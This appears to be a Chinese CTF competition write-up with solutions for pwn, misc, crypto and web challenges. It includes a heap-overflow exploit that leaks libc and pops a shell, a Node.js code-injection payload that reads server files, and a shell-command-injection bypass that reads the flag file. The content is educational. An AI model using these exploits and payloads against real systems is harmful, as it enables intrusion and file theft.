    # Write 0x18 bytes into a 0x10-byte entry so show() prints what follows
    # it; the 6 bytes read back are a puts address, hence the libc base.
    edit(0,0x18,'/bin/sh;'+'a'*0x10)
    show(0)
    io.recv(0x18)
    libc_base=u64(io.recv(6)+'\x00\x00')-libc.sym['puts']
    success('libc_base:'+hex(libc_base))
    # Same overflow, now placing system where the puts address was and
    # "/bin/sh" at the start of the content.
    edit(0,0x20,'/bin/sh\x00'+'a'*0x10+p64(libc_base+libc.sym['system']))
    show(0)
    #gdb.attach(io)
    #pause()
    io.interactive()
MISC:
抓貓貓
玩遊戲就 get flag
親愛的
可以分離一個壓縮包,
然後 壓縮包註釋,
qmusic 2019.7.27 17:47
嗯, 親愛的 熱愛的 李現版的海闊天空
然後找到 這個時間點的評論 真的上頭 解壓 拿到flag
嗯 翻了好久的我
Hide secret
分離後發現一個文件，但是已損壞。用 010 看，發現頭部像壓縮包，但只有 03 04；試着在前面補上 50 4B（壓縮包的魔數），試了試發現可以。
binwalk 1.jpg後分離出1.txt
得到一串
最後發現是 base92 解密。
解密就得出flag
信號不好我先掛了
這個是是合併的watermark
直接分離後
數獨
是一個數獨題目 一開始一直跑不出來,, 最後才知道 是這個題目少了一些限制,
bfs 就可以做 = = =
直接bfs一把梭
import datetime
from pwn import *
import copy
context.log_level = 'DEBUG'   # pwntools: log every byte sent and received
# `global sum` at module level has no effect; `sum` is assigned in __main__
# and shadows the builtin. `l` holds the empty-cell positions (row*100+col),
# list2 the parsed grid, list3 the working copy that dfs() fills in.
global sum
l=[]
list2 = []
list3 = []
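def pd(lens,v):
    """Return 1 if digit `v` may go into the `lens`-th empty cell, else 0.

    Only the row and column constraints are checked; the 3x3-box check stays
    disabled because, per the notes above, this challenge's grid does not
    enforce it. `//` keeps the row/column split integral on Python 3.
    """
    row = l[lens] // 100
    col = l[lens] % 100
    for i in range(9):
        if list3[i][col] == v or list3[row][i] == v:
            return 0
    # Disabled 3x3-box constraint, kept for reference:
    # x = (row // 3) * 3; y = (col // 3) * 3
    # for i in range(x, x + 3):
    #     for j in range(y, y + 3):
    #         if list3[i][j] == v:
    #             return 0
    return 1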
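def dfs(lens):
    """Fill empty cells `lens` onwards by depth-first search.

    Once all `sum` empty cells are filled, send each row's filled-in digits
    (comma-separated) to the server, hand over to the interactive session and
    return — the original fell through into the search loop afterwards and
    indexed `l[sum]`. `//` keeps the row/column split integral on Python 3.
    """
    print(lens, sum)
    #print l
    #print list3
    if lens == sum:
        for i in range(9):
            str_end = ''
            for j in range(9):
                if list2[i][j] == 0:
                    str_end += str(list3[i][j]) + (',')
            io.sendline(str_end[:-1])
            io.recvuntil('answer :\n')
        io.interactive()
        return
    row = l[lens] // 100
    col = l[lens] % 100
    for i in range(1, 10):
        if pd(lens, i) == 1:
            list3[row][col] = i
            dfs(lens + 1)
            list3[row][col] = 0   # backtrack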
if __name__ =="__main__":
    sum=0                      # becomes the number of empty cells
    for i in range(100):
        l.append(0)            # room for up to 100 empty-cell positions
    print l
    io=remote('101.71.29.5',10011)
    io.recvuntil('commas.')
    list1 = io.recvline()
    # Two lines are read per grid row; presumably a separator line precedes
    # each '|'-delimited data row — confirm against the server output.
    for i in range(9):
        list1 = io.recvline()
        list1 = io.recvline()
        list1 = list1.strip().split('|')[1:10]
        list2.append(list1)
    #print list2
    # Blank cells become 0, everything else an int.
    for i in range(9):
        for j in range(9):
            if list2[i][j]=='' or list2[i][j]==' ':
                list2[i][j]=0
            else:
                list2[i][j] = int(list2[i][j])
    list3 = copy.deepcopy(list2)
    #print list3
    io.recvuntil('Please input row 1 answer :')
    # Record every empty cell as row*100+col; `sum` ends as their count.
    for i in range(9):
        for j in range(9):
            if list3[i][j]==0:
                l[sum]=i*100+j
                sum+=1
    dfs(0)
Crypto
不僅僅是rsa
同一個 q，求最大公因數就可以。
from Crypto.Util.number import *
import gmpy2
import binascii
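p1=0xedbaab62d8b87c8f859dbea7981dc275fb080c66d4af11e2da21338133c8bfc1
q=0xd37984ec7c84c7a7e3326c0ef1ecc543abb78854f1c64927bc97ac4abcf1933b
p2=0xc5d721ad63a259550a062d26758e5a8a80135d07ee8b997ae608f131eb6234c9
e=41221
C1=4314251881242803343641258350847424240197348270934376293792054938860756265727535163218661012756264314717591117355736219880127534927494986120542485721347351
C2=485162209351525800948941613977942416744737316759516157292410960531475083863663017229882430859161458909478412418639172249660818299099618143918080867132349
n1=0xC461B3ED566F2D68583019170BDD5263D113BAECE3DEE6631F08A166376AC41FF5D4E90B3330E0FC26993E3B353F38F9B6B880DFBC5807636497561B7611047B
n2=0xA36E3A2A83FE2C1E33F285A08C3ECD36E377F4D9FFE828E2426D3ECED0A7F947631E932AEC327555511AC6D71E72686C1CB7DBBF3859A4D9A3D344FBF12A9553


def _modinv(a, m):
    """Modular inverse of `a` mod `m` by the extended Euclidean algorithm.

    Replaces gmpy2.invert so the script needs only the standard library.
    Raises ValueError when gcd(a, m) != 1 (no inverse exists).
    """
    old_r, r = a % m, m
    old_s, s = 1, 0
    while r:
        quotient = old_r // r
        old_r, r = r, old_r - quotient * r
        old_s, s = s, old_s - quotient * s
    if old_r != 1:
        raise ValueError("no modular inverse: gcd != 1")
    return old_s % m


def _even_hex(value):
    """Bare hex digits of `value`, zero-padded to an even length so that
    binascii.unhexlify accepts them. '%x' is used instead of hex(), which on a
    Python 2 long appends an 'L' that would break unhexlify."""
    digits = '%x' % value
    if len(digits) % 2:
        digits = '0' + digits
    return digits


# Both moduli share q, so each private exponent needs only its own p.
phi=(p1-1)*(q-1)
d=_modinv(e,phi)
phi=(p2-1)*(q-1)
d2=_modinv(e,phi)
m=pow(C1,d,n1)
mm=pow(C2,d2,n2)
m=_even_hex(m)
mm=_even_hex(mm)
a=m+mm
print(binascii.unhexlify(a))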
一句話加密
這個n 在圖像的最後
這個 kobe 真的誤導了我，讓我一直以爲 e 是 81。
後來我發現這個題目的n是另一道題的n,,,那個題目的e是2.。。
然後我用RSAtools 試了一下。。
發現確實是。。。
ECC
這個題目一開始沒有看出來是什麼情況 , 然後搞得我很懵逼,,
# Challenge-provided Sage script (not runnable as-is): `???????` marks the
# values the challenge withheld — the scalar k, the AES key and the nonce r.
E=EllipticCurve(GF(15424654874903),[16546484,4548674875])
G=E(6478678675, 5636379357093)
k=???????
K=k*G
#K=(2854873820564,9226233541419)
aes_key=???????
x=aes_key
M=E.lift_x(x)   # the AES key is the x-coordinate of the message point
r=?????????
C1=M+r*K        # EC-ElGamal form: C1 = M + r*K, C2 = r*G
x1,y1=C1.xy()
C2=r*G
x2,y2=C2.xy()
print 'C1(%d,%d),C2(%d,%d)'%(x1,y1,x2,y2)
#output:
C1(6860981508506,1381088636252),C2(1935961385155,8353060610242)
後來惡補了一波，但是原理還是有點懵。
但是最後還是安裝了這個工具 看了題解
直接用真的爽,
# Sage: recover k from K = k*G by discrete log (the field prime is only
# about 2^44, so this is cheap), then undo the encryption shown above using
# C1 - k*C2 = M + r*k*G - k*r*G = M.
E=EllipticCurve(GF(15424654874903),[16546484,4548674875])
G=E(6478678675, 5636379357093)
K=E(2854873820564,9226233541419)
k=G.discrete_log(K)
print 'k:%d'%(k)
C1=E(6860981508506,1381088636252)
C2=E(1935961385155,8353060610242)
M=C1-k*C2
aes_key,y=M.xy()   # the x-coordinate is the AES key
print 'aes_key:%d'%aes_key
print 'y:%d'%y
這個 運行出結果
跑出來key 之後就很簡單了
直接運行腳本就出來了
from Crypto.Cipher import AES
import base64
# The recovered key value "1026", space-padded to a 16-byte AES-128 key.
padded = "1026".ljust(16)
key = padded.encode("utf-8")
aes = AES.new(key, AES.MODE_ECB)
# Ciphertext is base64; ECB needs no IV.
text_enc_b64 = base64.b64decode('/cM8Nx+iAidmt6RiqX8Vww==')
text_enc = aes.decrypt(text_enc_b64)
print(text_enc)
Web
幫趙總結婚
嗯,就是爆破 只要字典夠大
Checkin
Nodejs注入 = =
查看
/calc require('fs').readdirSync('.').toString()
讀取
/calc require('fs').readFileSync('a.js','utf-8')
Bypass
沒有過濾tac
直接 /?a=./1.php%5c&b=%20%20%20%20%20%0a%20%20id%20%0a%20a=l%20%0a%20b=s%20%0a%20%20tac%20%20./.F1jh_/h3R3_1S_your_F1A9.txt%20%0a%5c
拿到flag
。